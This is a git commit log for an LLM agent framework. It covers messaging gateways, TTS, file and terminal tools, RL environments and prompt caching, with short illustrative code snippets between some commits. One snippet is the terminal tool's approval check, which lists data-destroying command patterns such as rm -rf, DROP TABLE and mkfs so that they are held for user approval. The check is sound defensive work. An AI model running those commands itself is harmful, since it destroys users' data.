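# Telegram voice bubbles want Opus in .ogg; everything else gets MP3.
import os

def tts_output_format() -> str:
    platform = os.environ.get("HERMES_PLATFORM", "")  # name assumed
    return "ogg" if platform == "telegram" else "mp3"
```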
teknium1
586b0a7047 Add Text-to-Speech (TTS) support with Edge TTS and ElevenLabs integration
- Updated `pyproject.toml` to include Edge TTS and ElevenLabs as dependencies.
- Enhanced documentation to detail voice message capabilities across platforms and TTS provider options.
- Modified the GatewayRunner to handle MEDIA tags from TTS tool responses, ensuring proper delivery of audio messages.
2026-02-14 16:08:14 -08:00
teknium1
84718d183a Add platform-specific formatting hints and identity for AIAgent
- Introduced a default agent identity prompt to ensure consistent behavior across platforms.
- Added platform-specific formatting hints for CLI, WhatsApp, Telegram, and Discord to guide the agent's output style.
- Updated the AIAgent initialization to accept a platform parameter, enhancing adaptability to different interfaces.
2026-02-12 16:11:16 -08:00
teknium1
3099a2f53c Add timestamp to active system prompt in AIAgent
- Appended the current local date and time to the active system prompt to provide context for the model, addressing potential misinterpretations due to training cutoffs.
2026-02-12 15:59:31 -08:00
teknium1
ed010752dd Update .env.example to use new Docker, Singularity, and Modal images for Python 3.11 with Node.js 20 support 2026-02-12 10:07:03 -08:00
teknium1
f5be6177b2 Add Text-to-Speech (TTS) functionality with multiple providers
Add tool previews

Add AGENTS and SOUL.md support

Add Exec Approval
2026-02-12 10:05:08 -08:00
teknium
89c6f24d48 Merge branch 'main' of github.com:nousresearch/hermes-agent 2026-02-12 05:38:15 +00:00
teknium
f23856df8e Add kill_modal script to manage Modal applications and better handling of file and terminal tools
- Introduced a new script, `kill_modal.sh`, to facilitate stopping running Modal apps, including the ability to stop all apps or specific swe-rex sandboxes.
- Enhanced user experience with clear usage instructions and feedback during the stopping process.
- Improved error handling to ensure smooth execution even if some apps fail to stop.
2026-02-12 05:37:14 +00:00
teknium
1b7bc299f3 Enhance TerminalBench2 environment with task filtering (for Modal-incompatible tasks) and logging improvements
- Updated task filter descriptions for clarity and added a new skip task feature to exclude incompatible tasks.
- Introduced a set of modal incompatible tasks to prevent execution errors in cloud environments.
- Implemented streaming JSONL logging for task results, preserving data even on interruptions.
- Refactored task evaluation logic to include skipped task reporting and improved error handling.
2026-02-12 05:36:45 +00:00
teknium
a291cc99cf More extra-kwarg support for provider selection etc. on OpenRouter in agent RL envs and evals 2026-02-12 05:36:25 +00:00
teknium
389ac5e017 Pass extra_body in the agent loop to ban/allowlist providers on OpenRouter, control thinking, etc. 2026-02-12 05:35:48 +00:00
nightwing
fc792a4be9 Update Project_notes.md: grailed-embedding-search status and TODOs (June 2025) 2026-02-11 17:54:47 -07:00
nightwing
07501bef14 Add Project_notes.md — centralized status tracker for all side projects 2026-02-11 17:36:18 -07:00
teknium1
137ce05324 Add image generation tool to toolsets for messaging platforms
- Included "image_generate" in the toolsets for web, vision, and skills categories, expanding functionality for image-related tasks.
- Updated comments for clarity on the new tool's purpose, ensuring users understand its integration within the existing framework.
2026-02-10 21:04:24 -08:00
teknium1
ada0b4f131 Enhance image handling in platform adapters
- Updated the image generation function description to clarify usage with markdown.
- Added `send_image` method to `BasePlatformAdapter` for native image sending across platforms.
- Implemented `send_image` in `DiscordAdapter` and `TelegramAdapter` to handle image attachments directly.
- Introduced `extract_images` method to extract image URLs from markdown and HTML, improving content processing.
- Enhanced message handling to support sending images as attachments while maintaining text content.
2026-02-10 21:02:40 -08:00
teknium
abe925e212 Update hermes-discord toolset to enable full terminal access with safety checks
- Revised the description to reflect full access capabilities, including terminal usage with a dangerous command approval system.
- Added terminal and file manipulation tools to the toolset, enhancing functionality for users.
- Updated comments for clarity on tool purposes, ensuring better understanding of available features.
2026-02-11 04:44:30 +00:00
teknium1
8fb44608bf Update SKILL.md and related references to implement container binding for labeled shapes and arrows in Excalidraw
- Revised the labeled shape and arrow sections to utilize container binding instead of the deprecated "label" property, ensuring proper text rendering.
- Added warnings about the invalidity of the "label" property and emphasized the use of `boundElements` for text elements.
- Updated examples in dark-mode and general references to reflect the new binding approach, enhancing clarity and usability for users creating diagrams.
2026-02-10 20:05:23 -08:00
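For reference, a minimal illustration of the binding shape: ids, coordinates, and the reduced field set are simplifications, so see the skill's references for the authoritative format:

```python
# Container binding: the shape lists the text element in boundElements,
# and the text element points back via containerId (no "label" field).
rect = {
    "id": "rect1", "type": "rectangle", "x": 0, "y": 0,
    "width": 160, "height": 60,
    "boundElements": [{"id": "text1", "type": "text"}],
}
label = {
    "id": "text1", "type": "text", "containerId": "rect1",
    "text": "Start", "x": 40, "y": 20,
}
```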
teknium1
153cd5bb44 Refactor skills tool integration and enhance system prompt
- Removed the skills_categories tool from the skills toolset, streamlining the skills functionality to focus on skills_list and skill_view.
- Updated the system prompt to dynamically build a compact skills index, allowing the model to quickly reference available skills without additional tool calls.
- Cleaned up related code and documentation to reflect the removal of skills_categories, ensuring clarity and consistency across the codebase.
2026-02-10 19:48:38 -08:00
teknium1
669545f551 Add diagramming skills for Excalidraw
- Introduced a new DESCRIPTION.md file outlining diagram creation skills for visual diagrams and flowcharts using Excalidraw.
- Added SKILL.md for the Excalidraw skill, detailing its functionality, usage, and workflow for creating hand-drawn style diagrams.
- Created references for color palettes, dark mode diagrams, and example diagrams to assist users in utilizing the Excalidraw skill effectively.
- Implemented an upload script for sharing diagrams via Excalidraw.com, ensuring user-friendly access to generated diagrams.
2026-02-10 19:30:46 -08:00
teknium1
cfe2f3fe15 Implement interrupt handling for long-running tool executions in AIAgent
- Added functionality to signal and terminate long-running terminal commands when a new user message is received, allowing for immediate agent response.
- Introduced a global interrupt event in the terminal tool to facilitate early termination of subprocesses.
- Updated the AIAgent class to handle interrupts gracefully, ensuring that remaining tool calls are skipped and appropriate messages are returned to maintain valid message sequences.
2026-02-10 16:34:27 -08:00
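A simplified sketch of the global-interrupt idea, assuming a threading.Event that new user input sets and the command runner polls:

```python
# Poll the subprocess in short slices so an interrupt can terminate it
# early instead of waiting out the full timeout.
import subprocess
import threading

INTERRUPT = threading.Event()

def run_with_interrupt(cmd: list[str], timeout: float = 300.0) -> int:
    proc = subprocess.Popen(cmd)
    remaining = timeout
    while remaining > 0:
        if INTERRUPT.is_set():
            proc.terminate()
            return -1  # signal "interrupted" to the agent loop
        try:
            return proc.wait(timeout=0.2)
        except subprocess.TimeoutExpired:
            remaining -= 0.2
    proc.kill()
    return -2  # timed out
```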
teknium1
140d609e0c Refine agent history conversion logic in GatewayRunner
- Enhanced the conversion of message history to agent format by distinguishing between normal and rich agent messages.
- Implemented logic to preserve full message structure for tool-related messages, ensuring valid assistant-to-tool sequences.
- Simplified handling of simple text messages by stripping unnecessary fields while retaining essential role and content information.
2026-02-10 16:16:30 -08:00
teknium
a32ad1a656 Fix infinite interrupt loop in gateway by consuming pending messages with .pop() and clearing interrupt events before recursion
- Added logic to clear the adapter's interrupt event to prevent infinite loops during message processing.
- Updated the get_pending_message method to pop messages from the pending queue, ensuring proper message handling.
2026-02-11 00:05:30 +00:00
teknium1
62ba69a29d Fix gateway exit code to enable systemd auto-restart on connection failure
- Updated the start_gateway function to return a boolean indicating success or failure, allowing for better control over exit codes.
- Modified the main function to handle gateway startup failures, ensuring systemd can automatically restart on transient errors.
- Enhanced error handling in the hermes_cli gateway to exit with code 1 if the gateway fails to connect to any platform.
2026-02-10 16:01:00 -08:00
teknium1
9b0f2a16ca Enhance CLI functionality with retry and undo commands
- Added /retry command to resend the last user message, improving user experience by allowing message re-sending without retyping.
- Introduced /undo command to remove the last user/assistant exchange from conversation history, providing better control over conversation flow.
- Updated save_config_value function to respect user and project config precedence, enhancing configuration management.
- Improved prompt handling and visual output for user input, adapting to terminal width for better readability.
2026-02-10 15:59:46 -08:00
teknium
85e629e915 Add cleanup functionality for orphaned sandboxes in TerminalBench2EvalEnv
- Implemented a cleanup process to terminate any remaining sandboxes after evaluation, addressing issues with orphaned thread pool workers.
- Enhanced logging to inform users about the cleanup process, ensuring better resource management and user awareness.
2026-02-10 23:48:49 +00:00
teknium
999a28062d Implement graceful exit cleanup for terminal tool
- Added a new `_atexit_cleanup` function to handle cleanup of active environments and stop the cleanup thread upon program exit.
- Enhanced logging to inform users about the number of remaining sandboxes being shut down during cleanup.
2026-02-10 22:53:44 +00:00
teknium
ba3fea24f1 Enhance TerminalBench 2 configuration and evaluation handling
- Added task_timeout parameter to enforce a maximum wall-clock time for each task, automatically scoring as FAIL if exceeded.
- Introduced terminal_timeout and tool_pool_size parameters to improve command execution and concurrency management.
- Updated logging to provide detailed task execution times and timeout handling, enhancing overall monitoring.
- Removed outdated evaluate_config.yaml file to streamline configuration management.
2026-02-10 22:53:24 +00:00
teknium
6b4a8d0b17 Add terminal configuration options and enhance environment setup
- Introduced terminal_timeout and terminal_lifetime parameters to control command execution and sandbox inactivity.
- Updated environment variable handling to allow configuration overrides for terminal settings.
- Enhanced logging to provide detailed information about terminal settings during initialization.
- Added tool_pool_size parameter to dynamically resize the thread pool for tool execution, improving concurrency management.
2026-02-10 22:51:50 +00:00
teknium
5ec75e38b9 Enhance tool execution and logging in HermesAgentLoop
- Increased thread pool size for tool execution from 8 to 128 to improve concurrency and prevent starvation.
- Added a function to resize the tool executor dynamically based on configuration.
- Enhanced logging to track API call durations and tool execution times, including warnings for slow tools.
- Improved overall performance monitoring by logging detailed information for each turn in the agent loop.
2026-02-10 22:51:18 +00:00
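Since stdlib pools expose no public resize API, the dynamic resize is presumably a swap; a sketch under that assumption, not the repo's actual function:

```python
# Replace the tool executor with a new pool of the configured size and
# let the old one drain in the background.
from concurrent.futures import ThreadPoolExecutor

_tool_executor = ThreadPoolExecutor(max_workers=128)

def resize_tool_executor(size: int) -> None:
    global _tool_executor
    old = _tool_executor
    _tool_executor = ThreadPoolExecutor(max_workers=size)
    old.shutdown(wait=False)  # in-flight tool calls finish on old pool
```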
teknium
ad042fdd68 Update terminalbench_2 configuration for enhanced performance and evaluation
- Increased max_token_length from 16000 to 32000 to allow for longer inputs.
- Adjusted agent_temperature from 0.6 to 0.8 for more varied responses.
- Extended test_timeout from 180 to 600 seconds to accommodate longer evaluations.
- Updated data directory path for saving evaluations to ensure proper organization.
2026-02-10 19:48:41 +00:00
teknium
35ad3146a8 Add new environments and enhance tool context functionality
- Introduced new environments: Terminal Test Environment and SWE Environment, each with default configurations for testing and software engineering tasks.
- Added TerminalBench 2.0 evaluation environment with comprehensive setup for agentic LLMs, including task execution and verification.
- Enhanced ToolContext with methods for uploading and downloading files, ensuring binary-safe operations.
- Updated documentation across environments to reflect new features and usage instructions.
- Refactored existing environment configurations for consistency and clarity.
2026-02-10 19:39:05 +00:00
teknium
e8343f2d87 Refactor Singularity environment for persistent container management
- Updated the _SingularityEnvironment class to utilize a persistent Apptainer instance, allowing state (files, installs, environment changes) to persist across commands.
- Enhanced the initialization process to start a background instance with full isolation and writable filesystem.
- Modified the execute method to connect to the running instance, ensuring commands run within the same container context.
- Implemented cleanup functionality to stop the persistent instance on cleanup or destruction, improving resource management.
- Updated class documentation to reflect new features and usage of the persistent environment.
2026-02-10 06:49:58 +00:00
teknium
1b1307d0d1 Implement Anthropic prompt caching for Claude models via OpenRouter
- Introduced a caching strategy that reduces input token costs by ~75% on multi-turn conversations by caching the conversation prefix.
- Added functions to apply cache control markers to messages, enhancing efficiency in token usage.
- Updated AIAgent to auto-enable prompt caching for Claude models, with configurable cache TTL.
- Enhanced logging to track cache hit statistics when caching is active, improving monitoring of token usage.
2026-02-10 06:49:41 +00:00
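A hedged sketch of applying Anthropic-style cache_control markers, which OpenRouter forwards; exactly which messages the real code marks is an assumption here:

```python
# Wrap selected messages' content in content blocks carrying an
# "ephemeral" cache_control marker so the provider caches the prefix.
def apply_cache_control(messages: list[dict]) -> list[dict]:
    out = []
    for i, msg in enumerate(messages):
        msg = dict(msg)
        if i == 0 or i == len(messages) - 1:  # marked points assumed
            msg["content"] = [{
                "type": "text",
                "text": msg["content"],
                "cache_control": {"type": "ephemeral"},
            }]
        out.append(msg)
    return out
```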
teknium
7a11be9f3f Enhance browser tool functionality and cleanup process
- Added checks for local installation of the agent-browser CLI in the `_find_agent_browser` function, improving installation guidance.
- Implemented per-task socket directory management in `_run_browser_command` to prevent concurrency issues.
- Updated `cleanup_browser` to remove per-task socket directories, ensuring proper resource cleanup after task completion.
- Refactored comments for clarity and improved documentation throughout the browser tool code.
2026-02-09 04:36:37 +00:00
teknium1
192ce958c3 Enhance CLI command handling and introduce resource cleanup features
- Added imports for resource cleanup during safe shutdown, including terminal and browser session cleanup.
- Refactored command handling to preserve original case for model names and prompt text, improving user experience.
- Introduced a dedicated interrupt queue to manage user input while the agent is running, preventing race conditions.
- Updated comments and documentation for clarity on command processing and input handling.
2026-02-08 13:31:45 -08:00
teknium1
c441681dc2 Update default model to 'anthropic/claude-opus-4.6' and refine terminal working directory settings
- Changed the default LLM model in the setup wizard and example environment file to 'anthropic/claude-opus-4.6'.
- Updated terminal working directory settings in CLI and related files to use the current directory ('.') instead of '/tmp'.
- Enhanced documentation comments for clarity on terminal configuration and working directory behavior.
2026-02-08 12:56:40 -08:00
teknium
dd70d57b9b Refactor BatchRunner and AIAgent for enhanced reasoning and tool management; improve tool definitions for fileops
- Updated `ALL_POSSIBLE_TOOLS` to auto-derive from `TOOL_TO_TOOLSET_MAP` for consistent schema.
- Introduced `_extract_reasoning_stats` function to track reasoning coverage in assistant turns.
- Enhanced `_process_batch_worker` to discard prompts with no reasoning and aggregate reasoning statistics.
- Updated documentation and comments for clarity on new features and changes.
2026-02-08 20:19:14 +00:00
teknium
f12ea1bc02 Enhance BatchRunner and AIAgent with new configuration options, default model now opus 4.6, default summarizer gemini flash 3
- Added `max_tokens`, `reasoning_config`, and `prefill_messages` parameters to `BatchRunner` and `AIAgent` for improved model response control.
- Updated CLI to support new options for reasoning effort and prefill messages from a JSON file.
- Modified example configuration files to reflect changes in default model and summary model.
- Improved error handling for loading prefill messages and reasoning configurations in the CLI.
- Updated documentation to include new parameters and usage examples.
2026-02-08 10:49:24 +00:00
Teknium
fa76a331b0 Merge pull request #19 from NousResearch/atropos-hermes-agent
Enhance async tool execution and error handling in Hermes agent for A…
2026-02-07 21:01:06 -08:00
teknium
d999d9876d Enhance async tool execution and error handling in Hermes agent for Atropos integration
- Updated `.gitignore` to exclude `testlogs` directory.
- Refactored `handle_web_function_call` in `model_tools.py` to support running async functions in existing event loops, improving compatibility with Atropos.
- Introduced a thread pool executor in `agent_loop.py` for running synchronous tool calls that internally use `asyncio.run()`, preventing deadlocks.
- Added `ToolError` class to track tool execution errors, enhancing error reporting during agent loops.
- Updated `wandb_log` method in `hermes_base_env.py` to log tool error statistics for better monitoring.
- Implemented patches in `patches.py` to ensure async-safe operation of tools within Atropos's event loop.
- Enhanced `ToolContext` and `terminal_tool.py` to utilize the new async handling, improving overall tool execution reliability.
2026-02-08 05:00:47 +00:00
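The async-compatibility core reduces to a run-async-from-anywhere helper; a minimal sketch, not the repo's actual function:

```python
# If an event loop is already running (as under Atropos), hand the
# coroutine to a worker thread with its own loop instead of calling
# asyncio.run() inline, which would raise or deadlock.
import asyncio
from concurrent.futures import ThreadPoolExecutor

_executor = ThreadPoolExecutor(max_workers=8)

def run_async(coro):
    try:
        asyncio.get_running_loop()
    except RuntimeError:
        return asyncio.run(coro)  # no loop running: safe to run inline
    return _executor.submit(asyncio.run, coro).result()
```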
Teknium
578a5fb6a9 Merge pull request #18 from NousResearch/atropos-hermes-agent
Upgrade installers to use uv
2026-02-07 16:00:05 -08:00
teknium
a8809bbd3e Transition installation to uv for Python version management and speed, streamlining setup
- Integrated `uv` as a fast Python package manager for automatic Python provisioning and dependency management.
- Updated installation scripts (`setup-hermes.sh`, `install.sh`, `install.ps1`) to utilize `uv` for installing Python and packages, streamlining the setup process.
- Revised `README.md` to reflect changes in installation steps, including symlinking `hermes` for global access and clarifying Python version requirements.
- Adjusted commands in `doctor.py` and other scripts to recommend `uv` for package installations, ensuring consistency across the project.
2026-02-07 23:54:53 +00:00
teknium
a478e44585 Increase max_token_length in TerminalTestEnv to 16000 for enhanced processing capacity 2026-02-07 21:11:07 +00:00
teknium
c0494b3558 Update pyproject.toml to refine dependency management
- Reorganized the 'all' dependencies to include specific optional groups for better modularity.
- Added support for 'hermes-agent' with distinct categories: modal, messaging, cron, cli, and dev.
2026-02-07 21:11:01 +00:00
Teknium
7f1cd014f2 Merge pull request #17 from NousResearch/atropos-hermes-agent
Add support for Atropos Agentic RL environments (requires branch tool…
2026-02-07 09:12:10 -08:00
teknium
07b615e96e Add support for Atropos Agentic RL environments (currently requires the tool_call_support branch in Atropos)
- Added new environments for reinforcement learning, including `HermesSweEnv` for software engineering tasks and `TerminalTestEnv` for inline testing.
- Introduced `ToolContext` for unrestricted access to tools during reward computation.
- Updated `.gitignore` to exclude `wandb/` directory.
- Enhanced `README.md` with detailed architecture and usage instructions for Atropos environments.
- Added configuration files for SWE and terminal test environments to streamline setup.
- Removed unnecessary compiled Python files from `__pycache__`.
2026-02-07 09:17:16 +00:00
Teknium
ab387a6120 Merge pull request #16 from NousResearch/atropos-hermes-agent
Update dependencies and enhance installation scripts
2026-02-06 16:05:50 -08:00
teknium
ac79725923 Update dependencies and enhance installation scripts
- Added `prompt_toolkit` as a direct dependency for interactive CLI support.
- Updated `modal` optional dependency to require `swe-rex[modal]>=1.4.0` for improved cloud execution capabilities.
- Enhanced `messaging` optional dependencies to include `aiohttp>=3.9.0` for WhatsApp bridge communication.
- Refined installation scripts to check for Python version requirements, emphasizing the need for Python 3.11+ for RL training tools.
- Improved setup scripts to ensure proper installation of submodules and dependencies, enhancing user experience during setup.
2026-02-07 00:05:04 +00:00
Teknium
8dd38318fc Merge pull request #15 from NousResearch/rl-capabilities
Rl capabilities && File Operator Tools
2026-02-05 03:50:42 -08:00
teknium1
533c064269 Add file manipulation tools and enhance setup scripts
- Introduced file manipulation capabilities in `model_tools.py`, including functions for reading, writing, patching, and searching files.
- Added a new `file` toolset in `toolsets.py` and updated distributions to include file tools.
- Enhanced `setup-hermes.sh` and `install.sh` scripts to check for and optionally install `ripgrep` for faster file searching.
- Implemented a new `file_operations.py` module to encapsulate file operations using shell commands.
- Updated `doctor.py` and `install.ps1` to check for `ripgrep` and provide installation guidance if not found.
- Added fuzzy matching and patch parsing capabilities to improve file manipulation accuracy and flexibility.
2026-02-05 03:49:46 -08:00
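A tiny sketch of the fuzzy-anchor idea behind the patch matching, assuming a difflib-based similarity cutoff; the real implementation likely differs:

```python
# Find the line that best matches a patch context snippet so edits can
# land even when the file has drifted slightly.
import difflib

def find_anchor(lines: list[str], snippet: str, cutoff: float = 0.8) -> int:
    best = difflib.get_close_matches(snippet, lines, n=1, cutoff=cutoff)
    return lines.index(best[0]) if best else -1
```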
teknium1
5c3105b437 Enhance RL test inference with WandB integration and real-time output streaming
- Added unique run ID generation for WandB tracking during test inference.
- Enabled WandB usage for test tracking and updated command-line arguments accordingly.
- Implemented real-time output streaming for process execution, improving log visibility and debugging.
- Enhanced error handling to display last few lines of stderr for better troubleshooting.
2026-02-04 21:07:07 -08:00
teknium1
3c0d0dba49 Update RL tools and enhance configuration management
- Modified `model_tools.py` to update default model IDs and add new RL function `rl_test_inference`.
- Enhanced `README.md` with installation instructions for submodules and updated API key usage.
- Improved `rl_cli.py` to load configuration from `~/.hermes/config.yaml` and set terminal working directory for RL tools.
- Updated `run_agent.py` to handle empty string arguments as empty objects for better JSON validation.
- Refined installation scripts to ensure submodules are cloned and installed correctly, enhancing setup experience.
2026-02-04 13:57:59 -08:00
teknium1
12bbca95ec Add tinker-atropos submodule and update RL training tools
- Added the tinker-atropos submodule for enhanced RL training capabilities.
- Updated model_tools.py to reorder RL function definitions and improve descriptions.
- Modified rl_cli.py to include checks for the tinker-atropos setup and provide user guidance.
- Adjusted toolsets.py and __init__.py to reflect changes in RL function availability.
- Enhanced rl_training_tool.py to manage training processes directly without a separate API server.
2026-02-04 10:36:01 -08:00
teknium1
f6574978de Add RL training configuration and tools
- Updated `.env.example` to include Tinker and WandB API keys for reinforcement learning training.
- Enhanced `model_tools.py` to clarify configuration options and streamline the RL training process.
- Expanded `README.md` with detailed instructions for setting up RL training using Tinker and WandB.
- Modified `hermes_cli` files to integrate RL training tools and ensure proper configuration checks.
- Improved `rl_training_tool.py` to reflect changes in training parameters and configuration management.
2026-02-04 09:36:51 -08:00
Teknium
8380895ae3 Update README.md 2026-02-04 00:35:45 -08:00
teknium1
f018999da9 initial RL training tools and loop 2026-02-03 23:41:26 -08:00
teknium1
51a6b7d2b5 Implement interrupt handling for message processing in GatewayRunner and BasePlatformAdapter
- Introduced a monitoring mechanism in GatewayRunner to detect incoming messages while an agent is active, allowing for graceful interruption and processing of new messages.
- Enhanced BasePlatformAdapter to manage active sessions and pending messages, ensuring that new messages can interrupt ongoing tasks effectively.
- Improved the handling of pending messages by checking for interrupts and processing them in the correct order, enhancing user experience during message interactions.
- Updated the cleanup process for active tasks to ensure proper resource management after interruptions.
2026-02-03 20:10:15 -08:00
teknium1
9bfe185a2e Implement interrupt handling for agent and CLI input, plus a persistent prompt line at the bottom of the CLI :)
- Enhanced the AIAgent class to support interrupt requests, allowing for graceful interruption of ongoing tasks and processing of new messages.
- Updated the HermesCLI to manage user input in a persistent manner, enabling real-time interruption of the agent's conversation.
- Introduced a mechanism in the GatewayRunner to handle incoming messages while an agent is running, allowing for immediate response to user commands.
- Improved overall user experience by providing feedback during interruptions and ensuring that pending messages are processed correctly.
2026-02-03 16:15:49 -08:00
teknium1
beeb7896e0 Refactor message handling and error logging in agent and gateway
- Updated the AIAgent class to extract the first user message for trajectory formatting, improving the accuracy of user queries in the trajectory format.
- Enhanced the GatewayRunner to convert transcript history into the agent format, ensuring proper handling of message roles and content.
- Adjusted the typing indicator refresh rate to every 2 seconds for better responsiveness.
- Improved error handling in the message sending process for the Telegram adapter, implementing a fallback mechanism for Markdown parsing failures, and logging send failures for better debugging.
2026-02-03 15:42:54 -08:00
teknium1
212460289b Enhance skills tool with an arg so it is called more reliably, and improve error handling in agent
- Updated the `skills_categories` function to include a `verbose` parameter, allowing users to request skill counts per category.
- Modified the `handle_skills_function_call` method to pass the `verbose` argument to `skills_categories`.
- Improved error handling in the `AIAgent` class by injecting a recovery message when invalid JSON arguments are detected, guiding users on how to correct their tool calls.
- Enhanced the `GatewayRunner` to return a user-friendly error message if the agent fails to generate a final response, improving overall user experience.
2026-02-03 15:26:59 -08:00
teknium1
221fb17c5e Refine typing indicator behavior in message handling
- Adjusted the `_keep_typing` method to refresh the typing indicator every 2 seconds instead of 4, improving responsiveness after progress messages.
- Updated the `GatewayRunner` to restore the typing indicator after sending progress messages, enhancing user experience during message processing.
2026-02-03 15:06:18 -08:00
teknium1
488deb04a4 fix telegram, import asyncio 2026-02-03 15:02:41 -08:00
teknium1
9d9eea9ac9 Enhance agent configuration and documentation for tool progress and working directory
- Updated the AIAgent class to include new parameters for maximum iterations and tool progress callback, improving agent behavior and user feedback.
- Added detailed documentation on working directory behavior for CLI and messaging platforms, clarifying the use of `MESSAGING_CWD`.
- Introduced tool progress notifications in messaging, allowing users to receive real-time updates during tool execution.
- Updated relevant sections in AGENTS.md, README.md, and messaging.md to reflect these enhancements and provide clearer setup instructions.
2026-02-03 14:57:27 -08:00
teknium1
e7f0ffbf5d Add tool progress notifications for messaging channels
- Introduced a new callback mechanism in the AIAgent class to send tool progress messages during execution, enhancing user feedback in messaging platforms.
- Updated the GatewayRunner to support tool progress notifications, allowing users to enable or disable this feature via environment variables.
- Enhanced the CLI setup wizard to prompt users for enabling tool progress messages and selecting the notification mode (all or new), improving configuration options.
- Updated relevant documentation to reflect the new features and configuration settings for tool progress notifications.
2026-02-03 14:54:43 -08:00
teknium1
a09b018bd5 Implement continuous typing indicator in message handling
- Added a new private method `_keep_typing` to send a typing indicator continuously while processing messages, refreshing every 4 seconds to comply with Telegram/Discord limitations.
- Updated the `handle_message` method to initiate the typing indicator at the start of message processing and ensure it stops once processing is complete, improving user experience during message handling.
2026-02-03 14:51:31 -08:00
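A minimal sketch of the keep-typing loop; the callback name and cancellation style are assumptions:

```python
# Re-send the typing action every few seconds until processing
# finishes, since platforms expire the indicator quickly.
import asyncio

async def keep_typing(send_typing, interval: float = 4.0):
    try:
        while True:
            await send_typing()  # platform callback, assumed async
            await asyncio.sleep(interval)
    except asyncio.CancelledError:
        pass  # handle_message cancels this task when done
```

A handler would typically start this with `task = asyncio.create_task(keep_typing(cb))` and cancel it in a `finally` block once the reply is sent.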
teknium1
7eac4ee9fe Update agent configuration for maximum tool-calling iterations
- Increased the default maximum tool-calling iterations from 20 to 60 in the CLI configuration and related files, allowing for more complex tasks.
- Updated documentation and comments to reflect the new recommended range for iterations, enhancing user guidance.
- Implemented backward compatibility for loading max iterations from the root-level configuration, ensuring a smooth transition for existing users.
- Adjusted the setup wizard to prompt for the maximum iterations setting, improving user experience during configuration.
2026-02-03 14:48:19 -08:00
teknium1
17a5efb416 Enhance messaging gateway configuration and security features
- Added new environment variables for Telegram and Discord bot configurations, including `TELEGRAM_ALLOWED_USERS` and `DISCORD_ALLOWED_USERS`, to restrict bot access to specific users.
- Updated documentation in AGENTS.md and README.md to include detailed setup instructions for the messaging gateway, emphasizing the importance of user allowlists for security.
- Improved the CLI setup wizard to prompt for allowed user IDs during configuration, enhancing user guidance and security awareness.
- Refined the gateway run script to support user authorization checks, ensuring only allowed users can interact with the bot.
2026-02-03 10:46:23 -08:00
teknium1
3e634aa7e4 Update requirements and enhance environment variable loading in gateway
- Updated requirements.txt to uncomment and ensure the installation of `python-telegram-bot` and `discord.py` packages.
- Enhanced the gateway run script to load environment variables from a specified path, improving configuration management and flexibility for different environments.
2026-02-03 07:02:59 -08:00
teknium1
5d3398aa8a Refactor terminal tool command approval process and enhance CLI feedback
- Updated the terminal tool's command approval flow to improve user interaction when executing potentially dangerous commands, replacing the previous confirmation method with a clear explanation and instructions for adding commands to the allowlist.
- Removed the internal `force` parameter from the model API, ensuring that dangerous command approvals are handled solely through user prompts.
- Enhanced the CLI to provide better feedback regarding tool availability, including improved messaging for enabled and disabled toolsets.
- Updated AGENTS.md to reflect changes in the command approval process and configuration instructions.
2026-02-02 23:46:41 -08:00
teknium1
76d929e177 Implement dangerous command approval system for terminal tool
- Added a safety mechanism to detect and approve potentially dangerous commands (e.g., `rm -rf`, `DROP TABLE`).
- Introduced an approval flow for local/SSH backends, prompting users for confirmation with options to allow once, for the session, or permanently.
- Updated configuration to include a `command_allowlist` for storing approved patterns.
- Enhanced messaging for sudo failures in messaging contexts.
- Updated relevant documentation in AGENTS.md and TODO.md to reflect these changes.
2026-02-02 23:35:18 -08:00
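A hedged sketch of the detection-plus-allowlist check; the first two patterns come from the commit message, the rest is illustrative:

```python
# A command needs approval when it matches a dangerous pattern and the
# user has not already allowlisted a matching pattern.
import re

DANGEROUS = [r"\brm\s+-rf\b", r"\bDROP\s+TABLE\b", r"\bmkfs\b"]

def needs_approval(command: str, allowlist: list[str]) -> bool:
    if any(re.search(p, command) for p in allowlist):
        return False  # pattern approved permanently by the user
    return any(re.search(p, command, re.IGNORECASE) for p in DANGEROUS)
```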
Teknium
be91af7551 Refactor TODO list and remove completed items
Removed high-priority immediate fixes section and reorganized the TODO list. Updated various sections to reflect new priorities and ideas.
2026-02-02 23:08:27 -08:00
teknium1
c9011fc7e1 Add uninstall command to CLI and update documentation
- Introduced a new `uninstall` command in the CLI for the Hermes Agent, allowing users to remove the agent while optionally retaining configuration files for future reinstallation.
- Updated AGENTS.md and README.md to include the new uninstall functionality, enhancing user guidance on available commands and their purposes.
- Improved command-line interface with detailed help options for the uninstall process, including flags for full removal and confirmation prompts.
2026-02-02 22:18:18 -08:00
teknium1
ff776b57bf Remove outdated .cursorrules file and add comprehensive AGENTS.md documentation
- Deleted the .cursorrules file, which contained legacy information about the Hermes-Agent project structure and development environment.
- Introduced AGENTS.md, a detailed development guide for the Hermes Agent, outlining project structure, configuration management, CLI architecture, and agent functionality.
- Enhanced user guidance for setting up the development environment and utilizing the CLI effectively, including new commands for configuration management.
2026-02-02 19:45:42 -08:00
teknium1
3ee788dacc Implement configuration migration system and enhance CLI setup
- Introduced a configuration migration system to check for missing required environment variables and outdated config fields, prompting users for necessary inputs during updates.
- Enhanced the CLI with new commands for checking and migrating configuration, improving user experience by providing clear guidance on required settings.
- Updated the setup wizard to detect existing installations and offer quick setup options for missing configurations, streamlining the user onboarding process.
- Improved messaging throughout the CLI to inform users about the status of their configuration and any required actions.
2026-02-02 19:39:23 -08:00
teknium1
fef504f038 Refactor configuration file management and improve user feedback
- Updated the setup wizard and installation scripts to standardize the configuration file paths under ~/.hermes, enhancing clarity for users.
- Improved messaging in the CLI to clearly indicate where configuration files and data directories are located.
- Streamlined the creation of configuration files, ensuring they are easily accessible and organized within the new directory structure.
2026-02-02 19:34:56 -08:00
teknium1
bbb5776763 Enhance tool availability checks and user feedback in CLI
- Updated the CLI to include a new method for displaying warnings about disabled tools due to missing API keys.
- Integrated tool availability checks into the setup wizard and doctor commands, providing users with clear information on which tools are available and what is required for full functionality.
- Improved user prompts and feedback regarding API key configuration, emphasizing the importance of setting up keys for certain tools.
- Added detailed summaries of tool availability during setup and diagnostics, enhancing the overall user experience.
2026-02-02 19:28:27 -08:00
teknium1
e87bee9ccd Refactor setup wizard for improved API key and provider configuration
- Updated the setup wizard to clarify the OpenRouter API key requirement and enhance user prompts for API key input.
- Streamlined the main agent provider selection process, allowing users to choose between OpenRouter and custom endpoints with improved guidance.
- Renumbered setup steps for better organization and clarity, ensuring a smoother user experience during configuration.
- Enhanced error handling and user feedback for API configuration, emphasizing the importance of the OpenRouter key for certain tools.
2026-02-02 19:23:20 -08:00
teknium1
69a338610a Enhance repository cloning logic in install script
